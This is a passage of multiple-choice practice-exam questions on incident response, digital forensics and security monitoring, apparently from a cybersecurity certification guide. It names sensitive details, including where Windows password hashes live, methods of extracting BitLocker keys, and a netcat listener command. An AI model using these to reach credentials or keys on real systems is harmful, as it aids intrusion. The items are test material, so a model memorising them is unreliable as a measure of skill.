B. Memory analysis
C. Boot-sector analysis
D. Brute-force cracking
136. Adam believes that a system on his network is infected but does not know which system. To detect it, he creates a query for his network monitoring software based on the following pseudocode. What type of traffic is he most likely trying to detect?

    destip: [*] and duration < 10 packets and destbytes < 3000 and
    flowcompleted = true and application = http or https or tcp or unknown
    and content != uripath:* and content != contentencoding:*

A. Users browsing malicious sites
B. Adware
C. Beaconing
D. Outbound port scanning
137. Casey’s search for a possible Linux backdoor account during a forensic investigation has 


led her to check through the filesystem for issues. Where should she look for back doors 
associated with services? 


A. /etc/passwd
B. /etc/xinetd.conf
C. /etc/shadow
D. $HOME/.ssh/


138. As an employee of the U.S. government, Megan is required to use NIST’s information 
impact categories to classify security incidents. During a recent incident, proprietary infor- 
mation was changed. How should she classify this incident? 


A. As a privacy breach
B. As an integrity loss
C. As a proprietary breach
D. As an availability breach


139. During what stage of an event is preservation of evidence typically handled? 
A. Preparation 
B. Detection and analysis 
C. Containment, eradication, and recovery 
D. Post-incident activity 
140. Susan is reviewing event logs to determine who has accessed a workstation after business hours. When she runs secpol.msc on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?

    [Local Security Policy > Advanced Audit Policy Configuration > System Audit Policies - Local Computer > Account Logon]

    Subcategory                                 Audit Events
    Audit Credential Validation                 Failure
    Audit Kerberos Authentication Service       Not Configured
    Audit Kerberos Service Ticket Operations    Not Configured
    Audit Other Account Logon Events            Not Configured

A. Login failures
B. Successful logins
C. Times from logins
D. User IDs from logins
141. Cynthia runs the command shown here while checking usage of her Linux system. Which of the following statements is true based on the information shown?

    [user1@demo ~]$ netstat -at
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address            Foreign Address          State
    tcp        0      0 localhost:32000          *:*                      LISTEN
    tcp        0      0 demo.example.com:5666    *:*                      LISTEN
    tcp        0      0 *:54090                  *:*                      LISTEN
    tcp        0      0 *:sunrpc                 *:*                      LISTEN
    tcp        0      0 *:ssh                    *:*                      LISTEN
    tcp        0      0 localhost:smtp           *:*                      LISTEN
    tcp        0      0 localhost:6011           *:*                      LISTEN
    tcp        0      0 demo.example.com:ssh     ruser.demo.com:44498     ESTABLISHED
    tcp        0      0 demo.example.com:ssh     remote.test.org:51812    ESTABLISHED
    tcp        0      0 localhost:32000          localhost:31000          ESTABLISHED
    tcp        0      0 *:monkeycom              *:*                      LISTEN
    tcp        0      0 *:60719                  *:*                      LISTEN
    tcp        0      0 *:sunrpc                 *:*                      LISTEN
    tcp        0      0 *:ssh                    *:*                      LISTEN
    tcp        0      0 localhost:6011           *:*                      LISTEN
    tcp        0      0 localhost:31000          localhost:32000          ESTABLISHED

A. There are two users logged in remotely via ssh.
B. The system is not providing any UDP services.
C. There is an active exploit in progress using the Monkeycom exploit.
D. The local system is part of the demo.com domain.
142. Lucas wants to purge a drive to ensure that data cannot be extracted from it when it is sent off-site. Which of the following is not a valid option for purging hard drives on a Windows system?

A. Use the built-in Windows sdelete command line.
B. Use Eraser.
C. Use DBAN.
D. Encrypt the drive and then delete the key.

143. The company that Charleen works for has been preparing for a merger, and during a quiet phase she discovers that the corporate secure file server that contained the details of the merger has been compromised. As she works on her report, how should she most accurately categorize the data that was breached?

A. PII
B. PHI
C. Intellectual property
D. Corporate confidential data

144. Which of the following is not a valid use case for live forensic imaging?

A. Malware analysis
B. Encrypted drives
C. Postmortem forensics
D. Nonsupported filesystems

145. Which of the following commands is the standard way to determine how old a user account is on a Linux system if [username] is replaced by the user ID that you are checking?

A. userstat [username]
B. ls -ld /home/[username]
C. aureport -auth | grep [username]
D. None of the above

146. Profiling networks and systems can help to identify unexpected activity. What type of detection can be used once a profile has been created?

A. Dynamic analysis
B. Anomaly analysis
C. Static analysis
D. Behavioral analysis

147. While reviewing the actions taken during an incident response process, Jennifer is informed by the local desktop support staff person that the infected machine was returned to service by using a Windows system restore point. Which of the following items will a Windows system restore return to a previous state?

A. Personal files
B. Malware
C. Windows system files
D. All installed apps
148. During a major incident response effort, Ben discovers evidence that a critical application server may have been the data repository and egress point in the compromise he is investigating. If he is unable to take the system offline, which of the following options will provide him with the best forensic data?

A. Reboot the server and mount the system drive using a USB-bootable forensic suite.
B. Create an image using a tool like FTK Imager Lite.
C. Capture the system memory using a tool like Volatility.
D. Install and run an imaging tool on the live server.

149. Charles wants to monitor file permission changes on a Windows system he is responsible for. What audit category should he enable to allow this?

A. File Permissions
B. User Rights
C. Filesystem
D. Audit Objects

150. Charles finds the following entries on a Linux system in /var/log/auth.log. If he is the only user with root privileges, requires two-factor authentication to log in as root, and did not take the actions shown, what should he check for?

    Jun 20 21:44:02 kali useradd[1433]: new group: name=demo, GID=1000
    Jun 20 21:44:02 kali useradd[1433]: new user: name=demo, UID=1000, GID=1000, home=/home/demo, shell=/bin/sh
    Jun 20 21:44:11 kali passwd[1438]: pam_unix(passwd:chauthtok): password changed for demo
    Jun 20 21:44:11 kali passwd[1438]: gkr-pam: couldn't update the login keyring password: no old password was entered
    Jun 20 21:44:14 kali su[1439]: Successful su for demo by root
    Jun 20 21:44:14 kali su[1439]: + /dev/pts/1 root:demo
    Jun 20 21:44:14 kali su[1439]: pam_unix(su:session): session opened for user demo by (uid=0)
    Jun 20 21:44:14 kali su[1439]: pam_systemd(su:session): Cannot create session: Already occupied by a session
    Jun 20 21:44:24 kali sudo: demo : user NOT in sudoers ; TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/bin/su
    Jun 20 21:44:53 kali sudo: root : TTY=pts/0 ; PWD=/var/log ; USER=root ; COMMAND=/usr/sbin/useradd apache2
    Jun 20 21:44:53 kali sudo: pam_unix(sudo:session): session opened for user root by (uid=0)
    Jun 20 21:44:53 kali useradd[1449]: new group: name=apache2, GID=1001
    Jun 20 21:44:53 kali useradd[1449]: new user: name=apache2, UID=1001, GID=1001, home=/home/apache2, shell=/bin/sh
    Jun 20 21:44:53 kali sudo: pam_unix(sudo:session): session closed for user root
    Jun 20 21:45:01 kali CRON[1455]: pam_unix(cron:session): session opened for user root by (uid=0)
    Jun 20 21:45:01 kali CRON[1455]: pam_unix(cron:session): session closed for user root
    Jun 20 21:45:03 kali passwd[1454]: pam_unix(passwd:chauthtok): password changed for apache2
    Jun 20 21:45:03 kali passwd[1454]: gkr-pam: couldn't update the login keyring password: no old password was entered
    Jun 20 21:45:14 kali su[1458]: Successful su for apache2 by demo
    Jun 20 21:45:14 kali su[1458]: + /dev/pts/1 demo:apache2
    Jun 20 21:45:14 kali su[1458]: pam_unix(su:session): session opened for user apache2 by (uid=1000)
    Jun 20 21:45:14 kali su[1458]: pam_systemd(su:session): Cannot create session: Already occupied by a session

A. A hacked root account
B. A privilege escalation attack from a lower privileged account or service
C. A malware infection
D. A RAT

151. A disgruntled former employee uses the systems she was responsible for to slow down the network that Chris is responsible for protecting during a critical business event. What NIST threat classification best fits this type of attack?

A. Impersonation
B. Attrition
C. Improper usage
D. Web
152. As part of his forensic analysis of a series of photos, John runs exiftool for each photo. He receives the following listing from one photo. What useful forensic information can he gather from this photo?

    File Name                       : IMG_20160307_145818.jpg
    File Modification Date/Time     : 2017:06:25 12:07:48-04:00
    File Access Date/Time           : 2017:06:25 12:07:59-04:00
    File Creation Date/Time         : 2017:06:25 12:07:59-04:00
    File Type                       : JPEG
    File Type Extension             : jpg
    MIME Type                       : image/jpeg
    Exif Byte Order                 : Big-endian (Motorola, MM)
    Modify Date                     : 2016:03:07 14:58:19
    GPS Date Stamp                  : 2016:03:07
    GPS Altitude Ref                : Above Sea Level
    GPS Longitude Ref               : West
    GPS Latitude Ref                : North
    GPS Time Stamp                  : 19:58:17
    Camera Model Name               : Nexus 6P
    Create Date                     : 2016:03:07 14:58:19
    F Number                        : 2.0
    Focal Length                    : 4.7 mm
    Aperture Value                  : 2.0
    Exposure Mode                   : Auto
    Sub Sec Time Digitized          : 013532
    Exif Image Height               : 3024
    Focal Length In 35mm Format     : 0 mm
    Scene Capture Type              : Standard
    Scene Type                      : Unknown (0)
    Flash                           : Off, Did not fire
    Exif Version                    : 0220
    Make                            : Huawei
    GPS Altitude                    : 602 m Above Sea Level
    GPS Date/Time                   : 2016:03:07 19:58:17Z
    GPS Latitude                    : 35 deg 36' 10.37" N
    GPS Longitude                   : 82 deg 33' 53.05" W
    GPS Position                    : 35 deg 36' 10.37" N, 82 deg 33' 53.05" W
    Image Size                      : 4032x3024
    Megapixels                      : 12.2

A. The original creation date, the device type, the GPS location, and the creator’s name
B. The endian order of the file, the file type, the GPS location, and the scene type
C. The original creation date, the device type, the GPS location, and the manufacturer of the device
D. The MIME type, the GPS time, the GPS location, and the creator’s name

153. During the preparation phase of his organization’s incident response process, Ben gathers a laptop with useful software including a sniffer and forensics tools, thumb drives and external hard drives, networking equipment, and a variety of cables. What is this type of pre-prepared equipment commonly called?

A. A grab bag
B. A jump kit
C. A crash cart
D. A first responder kit
154. Chris is analyzing Chrome browsing information as part of a forensic investigation. After querying the visits table that Chrome stores, he discovers a 64-bit integer value stored as “visit time” listed with a value of 131355792940000000. What conversion does he need to perform on this data to make it useful?

A. The value is in seconds since January 1, 1970.
B. The value is in seconds since January 1, 1601.
C. The value is a Microsoft timestamp and can be converted using the time utility.
D. The value is an ISO 8601-formatted date and can be converted with any ISO time utility.


155. Cynthia needs to ensure that the workstations she is responsible for have received a critical Windows patch. Which of the following methods should she avoid using to validate patch status for Windows 10 systems?

A. Check the Update History manually.
B. Run the Microsoft Baseline Security Analyzer.
C. Create and run a PowerShell script to search for the specific patch she needs to check.
D. Use SCCM to validate patch status for each machine on her domain.

156. As John proceeds with a forensic investigation involving numerous images, he finds a directory labeled Downloaded from Facebook. The images appear relevant to his investigation, so he processes them for metadata using exiftool. The following image shows the data provided. What forensically useful information can John gather from this output?

File Name                       : 19399716_1496065780413664_1441550028730397635_n.jpg
File Size                       : 70 kB
File Modification Date/Time     : 2017:06:25 12:07:26-04:00
File Access Date/Time           : 2017:06:25 12:07:26-04:00
File Creation Date/Time         : 2017:06:25 12:07:26-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
Resolution Unit                 : None
Current IPTC Digest             : 2f6ecc0d32eef36aad25edaff530323e
Original Transmission Reference : nP@wg6imjFN7U8R8DYa8
Special Instructions            : FBMD01000a9c0d00006e2900006e500000f1520000cb550000126e0000c8a60000f4ac800003b200004ab70000ef170100
Profile CMM Type                :
Profile Version                 : 2.0.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2009:03:27 21:36:31
Profile File Signature          : acsp
Primary Platform                : Unknown ()
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             :
Device Model                    :
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 :
Profile ID                      : 29f83ddeaff255ae7842fae4ca83390d
Profile Description             : sRGB IEC61966-2-1 black scaled
Blue Matrix Column              : 0.14307 0.06061 0.7141
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Device Model Desc               : IEC 61966-2-1 Default RGB Colour Space - sRGB
Green Matrix Column             : 0.38515 0.71687 0.09708
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Luminance                       : 0 80 0

A. The original file creation date and time
B. The device used to capture the image
C. The original digest (hash) of the file, allowing comparison to the original
D. None; Facebook strips almost all useful metadata from images.

157. The hospital that Ben works at is required to be HIPAA compliant and needs to protect HIPAA data. Which of the following is not an example of PHI?

A. Names of individuals
B. Records of health care provided
C. Records of payment for healthcare
D. Individual educational records

158. Ben works at a U.S. federal agency that has experienced a data breach. Under FISMA, which organization does he have to report this incident to?

A. US-CERT
B. The National Cyber Security Authority
C. The National Cyber Security Center
D. CERT/CC


159. Which of the following properly lists the order of volatility from least volatile to most volatile?

A. Printouts, swap files, CPU cache, RAM
B. Hard drives, USB media, DVDs, CD-RWs
C. DVDs, hard drives, virtual memory, caches
D. RAM, swap files, SSDs, printouts


160. Joe wants to recover the passwords for local Windows users on a Windows 7 workstation. Where are the password hashes stored?

A. C:\Windows\System32\passwords
B. C:\Windows\System32\config
C. C:\Windows\Secure\config
D. C:\Windows\Secure\accounts

161. While conducting a forensic review of a system involved in a data breach, Alex discovers a number of Microsoft Word files including files with filenames like critical_data.docx and sales_estimates_2017.docx. When he attempts to review the files using a text editor for any useful information, he finds only unreadable data. What has occurred?

A. Microsoft Word files are stored in .zip format.
B. Microsoft Word files are encrypted.
C. Microsoft Word files can be opened only by Microsoft Word.
D. The user has used antiforensic techniques to scramble the data.


162. Rick is attempting to diagnose high memory utilization issues on a macOS system and notices a chart showing memory pressure. What does memory pressure indicate for macOS when the graph is yellow and looks like the following image?

[Figure: MEMORY PRESSURE chart with Physical Memory: 8.00 GB, Memory Used: 7.15 GB, App Memory: 2.25 GB, Wired Memory: 2.71 GB, Cached Files: 794.0 MB, Compressed: 2.19 GB, Swap Used: 2.19 GB]

A. Memory resources are available.
B. Memory resources are available but being tasked by memory management processes.
C. Memory resources are in danger, and applications will be terminated to free up memory.
D. Memory resources are depleted, and the disk has begun to swap.
163. Lucas believes that one of his users has attempted to use built-in Windows commands to probe servers on the network he is responsible for. How can he recover the command history for that user if the system has been rebooted since the reconnaissance has occurred?

A. Check the bash history.
B. Open a command prompt window and hit F7.
C. Manually open the command history from the user’s profile directory.
D. The Windows command prompt does not store command history.

164. While conducting a wireless site survey, Susan discovers two wireless access points that are both using the same MAC address. When she attempts to connect to each, she is sent to a login page for her organization. What should she be worried about?

A. A misconfigured access point
B. A vendor error
C. An evil twin attack
D. A malicious MAC attack


165. During an incident response process, Alex discovers a running Unix process that shows that it was run using the command nc -k -l 6667. He does not recognize the service and needs assistance in determining what it is. Which of the following would best describe what he has encountered?

A. An IRC server
B. A network catalog server
C. A user running a shell command
D. A netcat server
166. Angela is conducting an incident response exercise and needs to assess the economic impact to her organization of a $500,000 expense related to an information security incident. How should she categorize this?

A. Low impact
B. Medium impact
C. High impact
D. Angela cannot assess the impact with the data given.


167. Chris needs to verify that his Linux system is sending system logs to his SIEM. What method can he use to verify that the events he is generating are being sent and received properly?

A. Monitor traffic by running Wireshark on the system.
B. Configure a unique event ID and send it.
C. Monitor traffic by running Wireshark on the SIEM device.
D. Generate a known event and monitor for it.


168. Susan wants to protect the Windows workstations in her domain from buffer overflow attacks. What should she recommend to the domain administrators at her company?

A. Install an anti-malware tool.
B. Install an antivirus tool.
C. Enable DEP in Windows.
D. Set VirtualAllocProtection to 1 in the registry.


169. What step follows sanitization of media according to NIST guidelines for secure media handling?

A. Reuse
B. Validation
C. Destruction
D. Documentation


170. Joe is responding to a ransomware incident that has encrypted financial and business data throughout the organization, including current payroll and HR data. As events currently stand, payroll cannot be run for the current pay period. If Joe uses the NIST functional impact categories shown here, how should Joe rate this incident?

Category   Definition
None       No effect to the organization’s ability to provide all services to all users.
Low        Minimal effect; the organization can still provide all critical services to all users but has lost efficiency.
Medium     Organization has lost the ability to provide a critical service to a subset of system users.
High       Organization is no longer able to provide some critical services to any users.

Source: NIST SP 800-61

A. Critical
B. Medium
C. High
D. Extended recovery
171. Lauren wants to create a documented chain of custody for the systems that she is handling as part of a forensic investigation. Which of the following will provide her with evidence that systems were not tampered with while she is not working with them?

A. A chain of custody log
B. Tamper-proof seals
C. System logs
D. None of the above


172. Matt’s incident response team has collected log information and is working on identifying attackers using that information. What two stages of the NIST incident response process is his team working in?

A. Preparation and containment, eradication, and recovery
B. Preparation and post-incident activity
C. Detection and analysis, and containment, eradication, and recovery
D. Containment, eradication, and recovery and post-incident activity


173. Angela wants to understand what a malware package does and executes it in a virtual machine that is instrumented using tools that will track what the program does, what changes it makes, and what network traffic it sends while allowing her to make changes on the system or to click files as needed. What type of analysis has Angela performed?

A. Manual code reversing
B. Interactive behavior analysis
C. Static property analysis
D. Dynamic code analysis


174. Ben discovers that the forensic image he has attempted to create has failed. What is the most likely reason for this failure?

A. Data was modified.
B. The source disk is encrypted.
C. The destination disk has bad sectors.
D. The data cannot be copied in RAW format.


175. Derek sets up a series of virtual machines that are automatically created in a completely isolated environment. Once created, the systems are used to run potentially malicious software and files. The actions taken by those files and programs are recorded and then reported. What technique is Derek using?

A. Sandboxing
B. Reverse engineering
C. Malware disassembly
D. Darknet analysis
176. Chris notices the following entries in his Squert web console (a web console for Sguil IDS data). What should he do next to determine what occurred?

10 1 1 22:42:49 [OSSEC] User missed the password more than one time 2502
6  1 1 22:42:49 [OSSEC] SSHD authentication failed. 5716
5  2 1 22:42:37 [OSSEC] User login failed. 5503
1  1 1 22:42:32 ET SCAN Potential SSH Scan 2001219

A. Review ssh logs.
B. Disable ssh and then investigate further.
C. Disconnect the server from the Internet and then investigate.
D. Immediately change his password.


177. Lauren wants to avoid running a program installed by a user that she believes is set with a RunOnce key in the Windows registry but needs to boot the system. What can she do to prevent RunOnce from executing the programs listed in the registry key?

A. Disable the registry at boot.
B. Boot into Safe Mode.
C. Boot with the -RunOnce flag.
D. RunOnce cannot be disabled; she will need to boot from external media to disable it first.


178. Joseph wants to determine when a USB device was first plugged into a Windows workstation. What file should he check for this information?

A. The registry
B. The setupapi log file
C. The system log
D. The data is not kept on a Windows system.


179. A major new botnet infection that uses a peer-to-peer command-and-control process much like 2007’s Storm botnet has been released. Lauren wants to detect infected systems but knows that peer-to-peer communication is irregular and encrypted. If she wants to monitor her entire network for this type of traffic, what method should she use to catch infected systems?

A. Build an IPS rule to detect all peer-to-peer communications that match the botnet’s installer signature.
B. Use beaconing detection scripts focused on the command-and-control systems.
C. Capture network flows for all hosts and use filters to remove normal traffic types.
D. Immediately build a network traffic baseline and analyze it for anomalies.


180. Which of the following activities is not part of the containment and restoration process?

A. Minimizing loss
B. Identifying the attacker
C. Limiting service disruption
D. Rebuilding compromised systems


181. Angela has recently taken a new position as the first security analyst that her employer has ever had on staff. During her first week, she discovers that there is no information security policy and that the IT staff do not know what to do during a security incident. Angela plans to stand up a CSIRT to handle incident response. What type of documentation should she provide to describe specific procedures that the CSIRT will use during events like malware infections and server compromise?

A. An incident response policy
B. An operations manual
C. An incident response program
D. A playbook


182. What type of attack behavior is shown here?

[Figure: three memory layout diagrams. The first shows Program Instructions, Program Data, and Return Address. The second and third show Program Instructions, Program Data, a Heap containing Malicious Code, and a Modified Return Address.]

A. Kernel override
B. RPC rewrite
C. Buffer overflow
D. Heap hack

183. While investigating a compromise, Jack discovers four files that he does not recognize and believes may be malware. What can he do to quickly and effectively check the files to see whether they are malware?

A. Submit them to a site like VirusTotal.
B. Open them using a static analysis tool.
C. Run strings against each file to identify common malware identifiers.
D. Run a local antivirus or anti-malware tool against them.
184. Alex is attempting to determine why a Windows system keeps filling its disk. If she wants to see a graphical view of the contents of the disk that allows her to drill down on each cluster, what Sysinternals tool should she use?

A. du
B. df
C. GraphDisk
D. DiskView


185. What useful information cannot be determined from the contents of the $HOME/.ssh folder when conducting forensic investigations of a Linux system?

A. Remote hosts that have been connected to
B. Private keys used to log in elsewhere
C. Public keys used for logins to this system
D. Passphrases associated with the keys

186. John believes that the image files he has encountered during a forensic investigation were downloaded from a site on the Internet. What tool can John use to help identify where the files were downloaded from?

A. Google reverse image search
B. Tineye
C. Bing Image Match
D. All of the above


187. Brian’s network suddenly stops working at 8:40 AM, interrupting video conferences, streaming, and other services throughout his organization, and then resumes functioning. When Brian logs into his PRTG console and checks his router’s traffic via the primary connection’s redundant network link, he sees the following graph. What should Brian presume occurred based on this information?

[Figure: PRTG Live Graph - 60 Minutes - 15 sec Interval, with a time axis running from 08:20 to 09:10]

A. The network failed and is running in cached mode.
B. There was a link card failure, and the card recovered.
C. His primary link went down, and he should check his secondary link for traffic.
D. PRTG stopped receiving flow information and needs to be restarted.
188. Alex needs to create a forensic copy of a BitLocker-encrypted drive. Which of the following is not a method that he could use to acquire the BitLocker key?

A. Analyzing the hibernation file
B. Analyzing a memory dump file
C. Retrieving the key from the MBR
D. Performing a FireWire attack on mounted drives
189. Adam works for a large university and sees the following graph in his PRTG console when looking at a year-long view. What behavioral analysis could he leverage based on this pattern?

[Figure: PRTG Daily Averages - 365 Days graph in megabit/second, spanning 2016-Aug through 2017-Jun, with series Bandwidth Traffic IN and Bandwidth Traffic OUT]

A. Identify unexpected traffic during breaks like the low point at Christmas.
B. He can determine why major traffic drops happen on weekends.
C. He can identify top talkers.
D. Adam cannot make any behavioral determinations based on this chart.
190. What is the space between the last sector containing logical data and the end of the cluster called?

A. Unallocated space
B. Ephemeral space
C. Slack space
D. Unformatted space
191. Frank wants to use netstat to get the process name, the PID, and the username associated with processes that are running on a Linux system he is investigating. What netstat flags will provide him with this information?

A. -na
B. -pt
C. -pe
192. Jack is preparing to take a currently running PC back to his forensic lab for analysis. As Jack considers his forensic process, one of his peers recommends that he simply pull the power cable rather than doing a software-based shutdown. Why might Jack choose to follow this advice?

A. It will create a crash log, providing useful memory forensic information.
B. It will prevent shutdown scripts from running.
C. It will create a memory dump, providing useful forensic information.
D. It will cause memory-resident malware to be captured, allowing analysis.

193. Amanda has been tasked with acquiring data from an iPhone as part of a mobile forensics effort. At this point, should she remove the SIM (or UICC) card from the device if she receives the device in a powered-on state?

A. While powered on, but after logical collection
B. While powered on, prior to logical collection
C. While powered off, after logical collection
D. While powered off, before logical collection

194. Rick wants to validate his recovery efforts and intends to scan a web server he is responsible for with a scanning tool. What tool should he use to get the most useful information about system vulnerabilities?

A. Wapiti
B. Nmap
C. OpenVAS
D. ZAP


195. What is the key goal of the containment stage of an incident response process?

A. To limit leaks to the press or customers
B. To limit further damage from occurring
C. To prevent data exfiltration
D. To restore systems to normal operation

196. What level of forensic data extraction will most likely be possible and reasonable for a corporate forensic examiner who deals with modern phones that provide filesystem encryption?

A. Level 1: Manual extraction
B. Level 2: Logical extraction
C. Level 3: JTAG or HEX dumping
D. Level 4: Chip extraction

197. Angela is performing a forensic analysis of a Windows 10 system and wants to provide an overview of usage of the system using information contained in the Windows registry. Which of the following is not a data element she can pull from the SAM?

A. Password expiration setting
B. User account type
C. Number of logins
D. The first time the account logged in
198. Samantha is preparing a report describing the common attack models used by advanced 
persistent threat actors. Which of the following is a typical characteristic of APT attacks? 
A. They involve sophisticated DDoS attacks. 
B. They quietly gather information from compromised systems. 
C. They rely on worms to spread. 
D. They use encryption to hold data hostage. 
199. During an incident response process, Alice is assigned to gather details about what data was accessed, if it was exfiltrated, and what type of data was exposed. What type of analysis is she doing?

A. Information impact analysis
B. Economic impact analysis
C. Downtime analysis
D. Recovery time analysis


200. Angela has discovered an attack that appears to be following the process flow shown here. What type of attack should she identify this as?

[Figure: a circular process flow with the stages Identify Target, Prepare for Attack, Access, Expand Access, Exfiltrate Data, and Conceal Evidence and Retain]

A. Phishing
B. Zero-day exploit
C. Whaling
D. Advanced persistent threat


Refer to the image shown here for questions 201 to 203.

[Figure: the EDRM flow, with stages Identification, Preservation, Collection, Production, and Presentation, running from High Volume toward High Relevance]

201. During an e-discovery process, Angela reviews the request from opposing counsel and builds a list of all of the individuals identified. She then contacts the IT staff who support each person to request a list of their IT assets. What phase of the EDRM flow is she in?

A. Information governance
B. Identification
C. Preservation
D. Collection

202. During the preservation phase of her work, Angela discovers that information requested as part of the discovery request has been deleted as part of a regularly scheduled data cleanup as required by her organization’s policies. What should Angela do?

A. Conduct a forensic recovery of the data.
B. Create synthetic data to replace the missing data.
C. Report the issue to counsel.
D. Purge any other data related to the request based on the same policy.


203. What phase should Angela expect to spend the most person-hours in?

A. Identification
B. Collection and preservation
C. Processing, review, and analysis
D. Production


204. The incident response kit that Cassandra is building is based around a powerful laptop so that she can perform on-site drive acquisitions and analysis. If she expects to need to acquire data from both SATA and IDE drives, what item should she include in her kit?

A. A write blocker
B. A USB hard drive
C. A multi-interface drive adapter
D. A USB-C cable


205. Which of the following items is not typically found in corporate forensic kits?

A. Write blockers
B. Crime scene tape
C. Label makers
D. Decryption tools

206. What incident response tool should Lauren build prior to an incident to ensure that staff can reach critical responders when needed?

A. A triage triangle
B. A call list
C. A call rotation
D. A responsibility matrix

207. While performing process analysis on a compromised Linux system, Kathleen discovers a process called “john” that is running. What should she identify as the most likely use of the program?

A. Password cracking
B. Privilege escalation
C. A rootkit
D. A user named John’s personal application

208. Which of the following organizations is not typically involved in post-incident communications?

A. Developers
B. Marketing
C. Public relations
D. Legal

209. While reviewing system logs, Charles discovers that the processor for the workstation he is reviewing has consistently hit 100% processor utilization by the web browser. After reviewing the rest of the system, no unauthorized software appears to have been installed. What should Charles do next?

A. Review the sites visited by the web browser when the CPU utilization issues occur
B. Check the browser binary against a known good version
C. Reinstall the browser
D. Disable TLS
210. Lauren finds that the version of Java installed on her organization’s web server has been replaced. What type of issue is this best categorized as?

A. Unauthorized software
B. An unauthorized change
C. Unexpected input
D. A memory overflow

211. Greg finds a series of log entries in his Apache logs showing long strings “AAAAAAAAAAAAAAAAAAAAAAA?” followed by strings of characters. What type of attack has he most likely discovered?

A. A SQL injection attack
B. A denial of service attack
C. A memory overflow attack
D. A PHP string-ring attack

212. Catherine wants to detect unexpected output from the application she is responsible for managing and monitoring. What type of tool can she use to detect unexpected output effectively?

A. A log analysis tool
B. A behavior-based analysis tool
C. A signature-based detection tool
D. Manual analysis
Security Architecture and Tool Sets

EXAM OBJECTIVES COVERED IN THIS CHAPTER:

✓ 4.1 Explain the relationship between frameworks, common policies, controls, and procedures.
  ■ Regulatory compliance
  ■ Frameworks
  ■ Policies
  ■ Controls
  ■ Procedures
  ■ Verifications and quality control

✓ 4.2 Given a scenario, use data to recommend remediation of security issues related to identity and access management.
  ■ Security issues associated with context-based authentication
  ■ Security issues associated with identities
  ■ Security issues associated with identity repositories
  ■ Security issues associated with federation and single sign-on
  ■ Exploits

✓ 4.3 Given a scenario, review security architecture and make recommendations to implement compensating controls.
  ■ Security data analytics
  ■ Manual review
  ■ Defense in depth

✓ 4.4 Given a scenario, use application security best practices while participating in the Software Development Life Cycle (SDLC).
  ■ Best practices during software development
  ■ Secure coding best practices

✓ 4.5 Compare and contrast the general purpose and reasons for using various cybersecurity tools and technologies.
  ■ Preventative
  ■ Collective
  ■ Analytical
  ■ Exploit
  ■ Forensics
1. Jim is helping a software development team integrate security reviews into their code review process. He would like to implement a real-time review technique. Which one of the following approaches would best meet his requirements?

A. Pair programming
B. Pass-around code review
C. Tool-assisted review
D. Formal code review


2. Sonia is investigating a server on her network that is behaving suspiciously. She used Process Explorer from the Sysinternals toolkit and found the results shown here. What service on this system is responsible for the most memory usage?

[Figure: Process Explorer (Sysinternals) window on EC2AMAZ-82IMI3E\Administrator listing processes with CPU, Private Bytes, Working Set, PID, Description, and Company Name columns. Descriptions visible include WMI Provider Host, KMS Connection Broker, Host Process for Windows Services, RDP Clipboard Monitor, RDP Session Input Handler, Shell Infrastructure Host, Spooler SubSystem App, XenSource Windows guest ..., SQL Server VSS Writer - 64 Bit, Adobe Acrobat Update Servi..., Google Installer, Microsoft Windows Search ..., Client Server Runtime Process, Windows Logon Application, Desktop Window Manager, and SQL Server Management St...; the largest Private Bytes values visible are 180,084 K, 120,372 K, and 101,112 K. Status bar: CPU Usage: 2.86%, Commit Charge: 68.98%, Processes: 79, Physical Usage: 86.27%]

A. Internet Explorer
B. Process Explorer
C. Database server
D. Web server


3. Jean is deploying a new application that will process sensitive health information about her organization’s clients. To protect this information, the organization is building a new network that does not share any hardware or logical access credentials with the organization’s existing network. What approach is Jean adopting?

A. Network interconnection
B. Network segmentation
C. Virtual LAN (VLAN) isolation
D. Virtual private network (VPN)


4. Norm is troubleshooting connectivity between a security device on his network and a 
remote SIEM service that is not receiving logs from the device. He runs several diagnostic 
commands from the security device and captures the network traffic while he is running 
those diagnostics. The following image shows the result of capturing some of that traffic 
with Wireshark. What does the currently inspected packet indicate? 


[Figure: Wireshark window "Capturing from Wi-Fi: en0" with frame 2 selected]

No.  Time      Source           Destination      Protocol  Length  Info
1    0.000000  10.36.19.226     151.101.185.67   ICMP      98      Echo (ping) request  id=0xfba8, seq=7/1792, ttl=64 (reply in 2)
2    0.022029  151.101.185.67   10.36.19.226     ICMP      98      Echo (ping) reply    id=0xfba8, seq=7/1792, ttl=55 (request in 1)
     0.213694  74.125.129.189   10.36.19.226     QUIC      976     Payload (Encrypted), PKN: 55815
     0.242770  10.36.19.226     74.125.129.189   QUIC      78      Payload (Encrypted), PKN: 19, CID: 7257069669639549826
     0.868880  74.125.129.189   10.36.19.226     QUIC      84      Payload (Encrypted), PKN: 56071
     0.868885  74.125.129.189   10.36.19.226     QUIC      62      Payload (Encrypted), PKN: 56327
     0.868931  74.125.129.157   10.36.19.226     TLSv1...  129     Application Data
     0.869040  10.36.19.226     74.125.129.157   TCP               53636 → 443 [ACK] Seq=1 Ack=64 Win=4095 Len=0 TSval=414745221 TSecr=1221219215
     0.869041  10.36.19.226     74.125.129.157   TCP               53636 → 443 [ACK] Seq=1 Ack=65 Win=4095 Len=0 TSval=414745221 TSecr=1221219215
     0.869221  74.125.129.189   10.36.19.226     QUIC              Payload (Encrypted), PKN: 56583
     0.869236  10.36.19.226     74.125.129.189   QUIC              Payload (Encrypted), PKN: 20, CID: 7257069669639549826
     0.877817  10.36.19.226     74.125.129.189   QUIC              Payload (Encrypted), PKN: 21, CID: 7257069669639549826
     0.891230  74.125.129.157   10.36.19.226     TCP               443 → 53636 [ACK] Seq=65 Ack=2 Win=175 Len=0 TSval=1221219256 TSecr=414745222
     0.904457  74.125.129.189   10.36.19.226     QUIC      279     Payload (Encrypted), PKN: 56839

Packet details for the selected frame:

Frame 2: 98 bytes on wire (784 bits), 98 bytes captured (784 bits) on interface 0
